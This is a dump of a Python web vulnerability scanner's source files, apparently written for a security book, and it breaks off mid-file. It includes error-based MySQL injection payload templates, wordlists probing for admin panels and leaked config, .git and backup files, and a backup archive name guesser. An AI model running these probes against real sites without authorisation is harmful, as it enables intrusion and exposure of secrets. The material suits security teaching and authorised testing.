https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/dtree.js
--------------------------------------------------------------------------------
/teye_report/template/js/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/js/.DS_Store
--------------------------------------------------------------------------------
/teye_web/parser/documentParser.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_web/parser/documentParser.pyc
-------------------------------------------------------------------------------- /thirdparty/libnmap/objects/cpe.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/cpe.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/host.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/host.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/os.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/os.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_fp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_fp.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/.DS_Store -------------------------------------------------------------------------------- /teye_report/template/dtree/dtree.css: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/dtree.css -------------------------------------------------------------------------------- /teye_report/template/dtree/img/cd.gif: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/cd.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/report.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/report.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/__init__.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_cpe.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_cpe.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_host.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_host.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/img/base.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/base.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/empty.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/empty.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/globe.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/globe.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/join.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/join.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/line.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/line.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/minus.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/minus.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/page.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/page.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/plus.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/plus.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/trash.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/trash.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/__init__.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/objects/service.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/objects/service.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/__init__.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/mongodb.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/mongodb.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_parser.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_parser.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_report.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_report.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_service.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_service.pyc -------------------------------------------------------------------------------- /teye_report/template/dtree/img/folder.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/folder.gif -------------------------------------------------------------------------------- /teye_dir/admin.list: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | /admin 3 | /manager 4 | /admin/admin_login.php 5 | /admin888 6 | /manager 7 | /guanli 8 | /houtai 9 | /gl 10 | -------------------------------------------------------------------------------- /teye_report/template/dtree/img/folderopen.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/folderopen.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/imgfolder.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/imgfolder.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/joinbottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/joinbottom.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/plusbottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/plusbottom.gif -------------------------------------------------------------------------------- /teye_report/template/dtree/img/question.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/question.gif -------------------------------------------------------------------------------- /thirdparty/libnmap/plugins/backendplugin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/backendplugin.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_new_parser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_new_parser.pyc -------------------------------------------------------------------------------- /thirdparty/libnmap/test/test_report_diff.pyc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_report_diff.pyc
--------------------------------------------------------------------------------
/teye_report/template/dtree/img/minusbottom.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/minusbottom.gif
--------------------------------------------------------------------------------
/teye_report/template/dtree/img/musicfolder.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/musicfolder.gif
--------------------------------------------------------------------------------
/teye_report/template/dtree/img/nolines_plus.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/nolines_plus.gif
--------------------------------------------------------------------------------
/worker.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
#coding=utf-8
# Entry point for a scan worker process: hands control to the `app` object
# exported by teye_worker.scan (presumably the Celery application that
# scan.config configures -- confirm).
import os
from teye_worker.scan import app

if __name__ == "__main__":
    # Runs only when executed as a script, never on import.
    app.worker_main()

--------------------------------------------------------------------------------
/teye_report/template/dtree/img/nolines_minus.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/teye_report/template/dtree/img/nolines_minus.gif
--------------------------------------------------------------------------------
/thirdparty/libnmap/plugins/backendpluginFactory.pyc:
--------------------------------------------------------------------------------
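https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/plugins/backendpluginFactory.pyc
--------------------------------------------------------------------------------
/rpc_client.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
rpc_client.py

Smoke test for an RPyC service: connect, call the exposed ``test`` method
once, print its result and disconnect.
'''
import rpyc

# NOTE(review): the endpoint is hard-coded and rpyc.connect() is used without
# an authenticator or TLS wrapper -- presumably a lab address on an isolated
# network; confirm, and prefer a configurable host plus an authenticated
# transport elsewhere.
c = rpyc.connect('192.168.126.167', 9999)
try:
    print c.root.test()
finally:
    # Release the connection even when the remote call raises.
    c.close()

--------------------------------------------------------------------------------
/thirdparty/libnmap/test/test_backend_plugin_factory.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/imiyoo2010/teye_scanner_for_book/HEAD/thirdparty/libnmap/test/test_backend_plugin_factory.pyc
--------------------------------------------------------------------------------
/scan.config:
--------------------------------------------------------------------------------
# NOTE(review): the broker URL carries no password; this assumes the Redis
# instance is reachable from localhost only -- confirm.
BROKER_URL = 'redis://localhost:6379/0'

# Tasks and results are serialized as JSON and only JSON is accepted, so a
# worker does not unpickle content read from the broker.
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_ACCEPT_CONTENT=['json']
CELERY_TIMEZONE = 'Europe/Oslo'
CELERY_ENABLE_UTC = True

--------------------------------------------------------------------------------
/tests/test_teye_poc.py:
--------------------------------------------------------------------------------
#coding=utf-8

def test_discuz_faq_sql():
    '''
    Run the discuz_faq_sql check once against vuln_url.

    NOTE(review): neither `vuln_key` nor `discuz_faq_sql` is defined or
    imported in this file, so as shown the test stops with NameError.
    The target is a live external site, so the outcome also depends on
    the network; a local fixture would make it deterministic.
    '''
    vuln_url="http://www.baidu.com"

    vuln_item = (vuln_url,vuln_key)
    v = discuz_faq_sql()
    v.check(vuln_url)

--------------------------------------------------------------------------------
/thirdparty/libnmap/objects/__init__.py:
--------------------------------------------------------------------------------
# -*- coding: utf-8 -*-

from libnmap.objects.report import NmapReport
from libnmap.objects.host import NmapHost
from libnmap.objects.service import NmapService

__all__ = ['NmapReport', 'NmapHost', 'NmapService']

--------------------------------------------------------------------------------
/teye_data/config.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
config.py

'''

class config(dict):
    '''
    dict subclass with named save/getData helpers.
    '''

    def save(self, variableName, value):
        '''
        Store value under variableName, replacing any earlier entry.
        '''
        self[variableName] = value

    def getData(self, variableName):
        '''
        Return the value stored under variableName, or None when absent.
        '''
        return self.get(variableName, None)

# Module-level instance created at import time.
cfg = config()

--------------------------------------------------------------------------------
/LogManager.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
LogManager.py
'''
import logging

# Record layout: logger name, level, process id, timestamp,
# module.function.line, then the message.
logging.basicConfig(format='%(name)s[%(levelname)s/%(process)d]:%(asctime)s:%(module)s.%(funcName)s.%(lineno)d - %(message)s')
log = logging.getLogger("TScanner")
log.setLevel(logging.INFO)
#log.addHandler(logging.StreamHandler())

--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
# NOTE(review): every entry is an exact pin to a dated release; check the set
# against current advisories (for example with pip-audit) before installing.
python-nmap==0.6.1
redis==2.10.6
pcap-parser==0.5.10
gevent==1.2.1
requests==2.14.2
timeout_decorator==0.4.0
SQLAlchemy==1.1.9
paramiko==2.2.1
beautifulsoup4==4.6.0
celery==4.1.0
dnspython==1.15.0
lxml==4.0.0
pypinyin==0.25.0
rpyc==3.4.4
simplejson==3.11.1
hashes==1.1.0
python-hashes==0.1dev-r0

--------------------------------------------------------------------------------
/thirdparty/libnmap/test/process-stressbox/stresstest.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
from libnmap.process import NmapProcess
from libnmap.parser import NmapParser, NmapParserException

# Run one nmap process against 127.0.0.1 with the '-sP' option string.
nm = NmapProcess('127.0.0.1', '-sP')
rc = nm.run()
if rc != 0:
    print("nmap scan failed: {0}".format(nm.stderr))

# The output is parsed even after a non-zero return code; `report` is not
# used afterwards.
try:
    report = NmapParser.parse(nm.stdout)
except NmapParserException as e:
    print("Exception raised while parsing scan: {0}".format(e.msg))

print(len(nm.stdout))

--------------------------------------------------------------------------------
/teye_web/http/querystring.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
querystring.py
'''
import encode_decode as enc_dec
from data import data

from encodings import DEFAULT_ENCODING

class querystring(data):
    '''
    `data` container whose string form is its URL-encoded query string.
    '''
    def __init__(self, init_val=(), strict=False, encoding=DEFAULT_ENCODING):
        '''
        Forward init_val and encoding to data.__init__; `strict` is
        accepted but not used here.
        '''
        data.__init__(self, init_val, encoding)

    def __str__(self):
        '''
        Return enc_dec.urlencode() of this mapping in self.encoding.
        '''
        return enc_dec.urlencode(self, encoding=self.encoding)



if __name__=="__main__":
    '''
    '''
    a = querystring([("a",[2,3])])
    print a

--------------------------------------------------------------------------------
/tests/test_class_FingerScan.py:
--------------------------------------------------------------------------------
#coding=utf-8

import sys
# NOTE(review): absolute path from one developer's machine; the import below
# fails elsewhere unless the package is on sys.path some other way.
sys.path.append('/Users/imiyoo/workplace/tscanner')

from teye_finger.FingerScan import FingerScan


def test_scan_finger():
    '''
    Fingerprint two lab URLs with FingerScan in mode 1 and print the
    results; nothing is asserted. `nginx_headers` is defined but unused.
    '''
    lnmp_body = "http://192.168.126.143/"

    nginx_headers = "http://192.168.1.143/"

    thinkphp_md5 = "http://192.168.126.143/thinkphp/"

    fs = FingerScan()
    fs.set_mode(1)
    res = fs.scan_finger(lnmp_body)
    print "%s 的应用指纹有:" % lnmp_body
    print res

    res1 = fs.scan_finger(thinkphp_md5)
    print "%s 的应用指纹有:" % thinkphp_md5
    print res1


--------------------------------------------------------------------------------
/teye_util/banner.py: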
--------------------------------------------------------------------------------
#coding=utf-8
'''
banner.py

Start-up banner text for the scanner.
'''

version="1.0-dev for book"

website="http://www.imiyoo.com/teye"

# The template has two %s slots, filled with version and website; the
# \033[...m sequences are ANSI colour/underline codes.
# NOTE: the column spacing of the ASCII art was collapsed on this page, so
# the rows below no longer line up.
banner='''
_____ ____
|_ _|__ _ _ ___ / ___| ___ __ _ _ __ _ __ ___ _ __
| |/ _ \ | | |/ _ \ \___ \ / __/ _` | '_ \| '_ \ / _ \ '__|\033[1;31m{%s}\033[0m
| | __/ |_| | __/ ___) | (_| (_| | | | | | | | __/ |
|_|\___|\__, |\___| |____/ \___\__,_|_| |_|_| |_|\___|_| \033[4;37m%s\033[0m
|___/
'''% (version,website)


def scan_banner():
    '''
    Print the formatted banner to stdout.
    '''
    print banner

--------------------------------------------------------------------------------
/teye_web/util/error_sql.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
error_sql.py
'''
from misc.common import md5,rand_numbers

# Probe templates keyed by technique name.
error_base_sql_db={
    "floor":"(select{test 1}from (select count(*),concat(md5([CHECK_KEY]),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "extractvalue":"(extractvalue(1,concat(0x7e,(select md5(1)),0x7e)))",
    "updatexml":"(updatexml(1,concat(0x7e,(select md5(1)),0x7e),1))"
}



def get_error_sql_key(type="floor"):
    '''
    Return (sql, key) for the template named by `type`.

    sql is the template with [CHECK_KEY] replaced by rand_numbers(2);
    key is md5() of that same value with "1" appended.

    NOTE(review): only the "floor" template contains [CHECK_KEY]; the
    other two embed md5(1), so the key returned for them is derived from
    a value they do not contain. An unknown `type` makes .get() return
    None and the .replace() call fail with AttributeError.
    '''
    num = rand_numbers(2)

    sql = error_base_sql_db.get(type).replace("[CHECK_KEY]",num)

    key = md5(num)+"1"

    return sql,key

--------------------------------------------------------------------------------
/tests/test_URL.py:
--------------------------------------------------------------------------------
#coding=utf-8

from teye_web.http.URL import URL


def setUp():
    pass

def tearDown():
    pass


def TestURL():
    '''
    Check the URL accessors on one full URL, then print get_filename()
    for a path without and with a trailing slash.
    '''
    url = URL("http://www.anquanbao.com/book/index.php?id=1#top")
    assert url.get_host()=="www.anquanbao.com"
    print url.get_port()
    assert url.get_port()==80
    assert url.get_path()=="/book/index.php"
    assert url.get_filename()=="index.php"
    assert url.get_ext() =="php"
    assert url.get_fragment()=="top"
    url = URL("http://www.anquanbao.com/book")
    print url.get_filename()

    url = URL("http://www.anquanbao.com/book/")
    print url.get_filename()

--------------------------------------------------------------------------------
/tests/test_page_404.py:
--------------------------------------------------------------------------------
#coding=utf-8

from wCurl import wcurl
from teye_util.page_404 import is_404

def test_is_404():
    '''
    Fetch an existing and a missing page from two sites and check
    is_404() on each response. The requests go to live external hosts,
    so the result depends on the network and on those sites.
    '''
    url_200 = "http://www.anquanbao.com/"
    url_404 = "http://www.anquanbao.com/noexist.html"

    resp_200 =wcurl.get(url_200)
    resp_404 =wcurl.get(url_404)

    assert is_404(resp_200)==False
    assert is_404(resp_404)==True


    url_200 = "http://www.baidu.com/"
    url_404 = "http://www.baidu.com/noexist.html"

    resp_200 =wcurl.get(url_200)
    resp_404 =wcurl.get(url_404)

    assert is_404(resp_200)==False
    assert is_404(resp_404)==True

--------------------------------------------------------------------------------
/teye_file/webdir/web.lst:
--------------------------------------------------------------------------------
#coding=utf-8
/admin
/manager
/admin888
/guanli
/manager/html
/examples/
/log.txt
/test.html
/1.php
/info.php
/i.php
/test.php
/.svn/
/.svn/entries
/install/
/.git/
/.git/config
/.DS_Store
/.idea/workspace.xml
/.project
/.htaccess
/install.log
/LICENSE.txt
/license.txt
/readme.rst
/readme.txt
/readme.html
#wdcp探针
/iProber2.php
#Discuz X 3.2
/utility/
/update.php
/restore.php
/uc_server/tools.php
/config/config_global_default.php.bak
/config/config_ucenter_default.php.bak
#Wordpress
/wp-config.php.bak
/wp-config-sample.php.bak

--------------------------------------------------------------------------------
/thirdparty/libnmap/test/process-stressbox/multi_nmap_process.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

from libnmap.process import NmapProcess

def make_nmproc_obj(targets, options):
    # One NmapProcess per target, all sharing the same option string.
    return NmapProcess(targets=targets, options=options)

def start_all(nmprocs):
    # Processes are run one after another; run() is called in sequence.
    for proc in nmprocs:
        print("Starting scan for host {0}".format(proc.targets))
        proc.run()

def summarize(nmprocs):
    # Print the return code and output length of each process.
    for proc in nmprocs:
        print("rc: {0} output: {1}".format(proc.rc, len(proc.stdout)))

# Twenty identical localhost targets.
nm_targets = ["localhost"] * 20
nm_opts = "-sT"

nm_procs = [make_nmproc_obj(target, nm_opts) for target in nm_targets]
start_all(nm_procs)

summarize(nm_procs)

--------------------------------------------------------------------------------
/teye_web/util/rand_string.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
rand_string.py

Random filler strings built with the `random` module. Its generator is
predictable, so these values are not suitable as secrets or tokens.
'''
from string import letters, digits
from random import choice, randint

def _rand_from(chars, length):
    # length 0 (the default of the public helpers) means "pick a length
    # between 6 and 10".
    count = length or randint(6, 10)
    return ''.join(choice(chars) for _ in xrange(count))

def rand_letter(length=0):
    '''
    Return `length` random letters (6-10 of them when length is 0).
    '''
    return _rand_from(letters, length)

def rand_char(length=0):
    '''
    Return `length` random letters or digits (6-10 when length is 0).
    '''
    return _rand_from(letters + digits, length)

def rand_number(length=0):
    '''
    Return `length` random digits as a string (6-10 when length is 0).
    '''
    return _rand_from(digits, length)


if __name__=="__main__" :
    '''
    '''
    print rand_letter(10)
    print rand_char(10)
    print rand_number(10)

--------------------------------------------------------------------------------
/thirdparty/libnmap/test/process-stressbox/proc_async.py:
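--------------------------------------------------------------------------------
#!/usr/bin/env python
"""Start one nmap scan in the background and print its progress until it ends."""

from libnmap.process import NmapProcess
from time import sleep


nmap_proc = NmapProcess(targets="scanme.nmap.org", options="-sT")
nmap_proc.run_background()
while nmap_proc.is_running():
    nmaptask = nmap_proc.current_task
    # current_task can be falsy; only report when a task is available
    if nmaptask:
        print("Task {0} ({1}): ETC: {2} DONE: {3}%".format(nmaptask.name,
                                                           nmaptask.status,
                                                           nmaptask.etc,
                                                           nmaptask.progress))
    sleep(0.5)

print("rc: {0} output: {1}".format(nmap_proc.rc, nmap_proc.summary))
print(nmap_proc.stdout)

--------------------------------------------------------------------------------
/teye_web/parser/documentParser.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
documentParser.py
'''
import HtmlParser as HtmlParser
import re
import StringIO


class documentParser:
    '''
    Wrapper that builds an HtmlParser for a response and forwards the
    URL and form accessors to it.
    '''
    def __init__(self,Response):
        '''
        Build the underlying HtmlParser for Response.

        :param Response: response object; it is handed to HtmlParser and
                         its get_url() is used in the error message
        :raises Exception: if HtmlParser cannot be built for the response
        '''
        try:
            parser = HtmlParser.HtmlParser(Response)
        except Exception:
            msg = 'There is no parser for "%s".' % Response.get_url()
            # The previous `raise msg` raised a plain string, which is itself
            # a TypeError and hid this message from the caller.
            raise Exception(msg)

        self._parser = parser

    def get_get_urls(self):
        '''
        Return whatever the underlying parser's get_get_urls() returns.
        '''
        return self._parser.get_get_urls()

    def get_form_reqs(self):
        '''
        Return whatever the underlying parser's get_form_reqs() returns.
        '''
        return self._parser.get_form_reqs()

    def get_forms(self):
        '''
        Return whatever the underlying parser's get_forms() returns.
        '''
        return self._parser.get_forms()
--------------------------------------------------------------------------------
/teye_web/http/data.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
data.py
'''

import urlparse
import encode_decode as enc_dec

from encodings import DEFAULT_ENCODING

class data(dict):
    '''
    dict subclass holding request parameters together with an encoding name.
    '''
    def __init__(self,init_val=(),encoding=DEFAULT_ENCODING):
        '''
        :param init_val: another data instance (copied), a query string
                         ("a=1&b=2"), or an iterable of (key, value) pairs
        :param encoding: stored on the instance as self.encoding
        :raises TypeError: if an item of the iterable cannot be unpacked
        '''
        dict.__init__(self)

        self.encoding = encoding

        if isinstance(init_val, data):
            dict.update(self, init_val)
        elif isinstance(init_val,basestring):
            # parse_qs maps each name to a list of values; only the first
            # value of a repeated parameter is kept
            for k, v in urlparse.parse_qs(init_val).items():
                self[k]=v[0]
        else:
            for item in init_val:
                try:
                    key, val = item
                except TypeError:
                    raise TypeError('key ,val= item')
                self[key] = val


if __name__=="__main__":
    a = data("user=1&password=2")
    print a

--------------------------------------------------------------------------------
/misc/factory.py:
--------------------------------------------------------------------------------
#coding=utf-8
'''
factory.py
'''
import sys
import traceback

def factory(moduleName, **args):
    '''
    Dynamically import a plugin module and return an instance of its class.

    The class is looked up under the last dotted component of moduleName,
    so module "a.b.Foo" has to define a class named "Foo".

    NOTE(review): __import__ runs the module's top-level code. moduleName
    should therefore come from a fixed set of known plugin names and never
    be built from scan input or other externally supplied data.

    :param moduleName: dotted module path of the plugin
    :param args: keyword arguments forwarded to the plugin constructor
    :return: the new plugin instance
    :raises Exception: if the import, the class lookup or the constructor
                       fails; the message names the failing step
    '''
    try:
        __import__(moduleName)
    except Exception as e:
        raise Exception('Error Import Plugin: '+ moduleName +', Exception: ' + str(e))

    className = moduleName.split('.')[-1]

    try:
        aClass = getattr(sys.modules[moduleName], className)
    except Exception:
        raise Exception('Error Load Plugin: '+ moduleName + '.')

    try:
        # args is the dict collected by **args, so it has to be expanded with
        # ** again. The previous aClass(*args) handed the keyword *names* to
        # the constructor as positional values and dropped the real values.
        inst = aClass(**args)
    except Exception as e:
        msg = 'Error Instance: ' + className + ', Exception: ' + str(e) + ', Traceback: ' + str( traceback.format_exc() )
        raise Exception(msg)
    return inst


--------------------------------------------------------------------------------
/thirdparty/libnmap/test/process-stressbox/stop_scan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
"""Start a background nmap scan, report the current task, then stop the scan."""

from libnmap.process import NmapProcess
from time import sleep


nmap_proc = NmapProcess(targets="scanme.nmap.org", options="-sV")
nmap_proc.run_background()
while nmap_proc.is_running():
    nmaptask = nmap_proc.current_task
    if nmaptask:
        print("Task {0} ({1}): ETC: {2} DONE: {3}%".format(nmaptask.name,
                                                           nmaptask.status,
                                                           nmaptask.etc,
                                                           nmaptask.progress))
    # give the scan three seconds, then ask the process to stop
    sleep(3)
    nmap_proc.stop()

print("rc: {0} output: {1}".format(nmap_proc.rc, nmap_proc.summary))
print(nmap_proc.stdout)
print(nmap_proc.stderr)

-------------------------------------------------------------------------------- /teye_web/parser/dpCache.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | ''' 3 | dpCache.py 4 | ''' 5 | from __future__ import with_statement 6 | 7 | import documentParser as documentParser 8 | from lru import LRU 9 | import threading 10 | 11 | 12 | class dpCache: 13 | ''' 14 | This class is a document parser cache.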
15 | ''' 16 | def __init__(self): 17 | self._cache = LRU(30) 18 | self._LRULock = threading.RLock() 19 | 20 | def getDocumentParserFor(self, Response): 21 | ''' 22 | ''' 23 | res = None 24 | hash_string = hash(Response.body) 25 | 26 | with self._LRULock: 27 | if hash_string in self._cache: 28 | res = self._cache[ hash_string ] 29 | else: 30 | # Create a new instance of dp, add it to the cache 31 | res = documentParser.documentParser(Response) 32 | self._cache[ hash_string ] = res 33 | 34 | return res 35 | 36 | dpc = dpCache() 37 | -------------------------------------------------------------------------------- /teye_web/util/gen_zip_name.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | def gen_zip_name(domain): 4 | ''' 5 | ''' 6 | common_list = ["demo","wwwtest","test","www","wwwbak","wwwroot","w","wbak","web","webroot","root","default","home","homeroot","1","111","123"] 7 | 8 | black_list = ["com","cn","org"] 9 | 10 | d_list = domain.split(".") 11 | #过滤掉IP地址 12 | #域名:www.watscan.com 13 | common_list.append(domain) 14 | #域名:watscan.com,watscan_com 15 | new_domain_1 = ".".join(d_list[1:]) 16 | new_domain_2 = "_".join(d_list[1:]) 17 | common_list.append(new_domain_1) 18 | common_list.append(new_domain_2) 19 | #域名:www_watscan_com 20 | new_domain_3 = "_".join(d_list) 21 | common_list.append(new_domain_3) 22 | 23 | 24 | for item in d_list: 25 | if item=="www": 26 | continue 27 | if item in black_list: 28 | continue 29 | common_list.append(item) 30 | 31 | return common_list 32 | 33 | -------------------------------------------------------------------------------- /thirdparty/libnmap/test/process-stressbox/stressback.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from libnmap.process import NmapProcess 4 | from time import sleep 5 | 6 | def make_nmproc_obj(targets, options): 7 | return NmapProcess(targets=targets, options=options) 8 | 9 | 
def start_all_bg(nmprocs): 10 | for nmp in nmprocs: nmp.run_background() 11 | 12 | def any_running(nmprocs): 13 | return any([nmp.is_running() for nmp in nmprocs]) 14 | 15 | def summarize(nmprocs): 16 | for nmp in nmprocs: 17 | print("rc: {0} output: {1}".format(nmp.rc, len(nmp.stdout))) 18 | print(nmp.stdout) 19 | 20 | nb_targets = 10 21 | nm_target = "localhost" 22 | nm_opts = "-sP" 23 | 24 | nm_targets = [nm_target for i in range(nb_targets)] 25 | nm_procs = [make_nmproc_obj(t, nm_opts) for t in nm_targets] 26 | start_all_bg(nm_procs) 27 | 28 | while any_running(nm_procs): 29 | sleep(5) 30 | 31 | summarize(nm_procs) 32 | -------------------------------------------------------------------------------- /tests/test_dns.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | #test_dns.py 3 | 4 | import socket 5 | 6 | _dnscache = {} 7 | 8 | def _setDNSCache(): 9 | def _getaddrinfo(*args,**kwargs): 10 | global _dnscache 11 | if args in _dnscache: 12 | return _dnscache[args] 13 | else: 14 | _dnscache[args] = socket._getaddrinfo(*args,**kwargs) 15 | return _dnscache[args] 16 | 17 | if not hasattr(socket,'_getaddrinfo'): 18 | socket._getaddrinfo = socket.getaddrinfo 19 | socket.getaddrinfo = _getaddrinfo 20 | def test(): 21 | _setDNSCache() 22 | import requests 23 | r1 = requests.get('http://www.baidu.com') 24 | print "第一次没命中缓存的时间:"+str(r1.elapsed.microseconds) 25 | r2 = 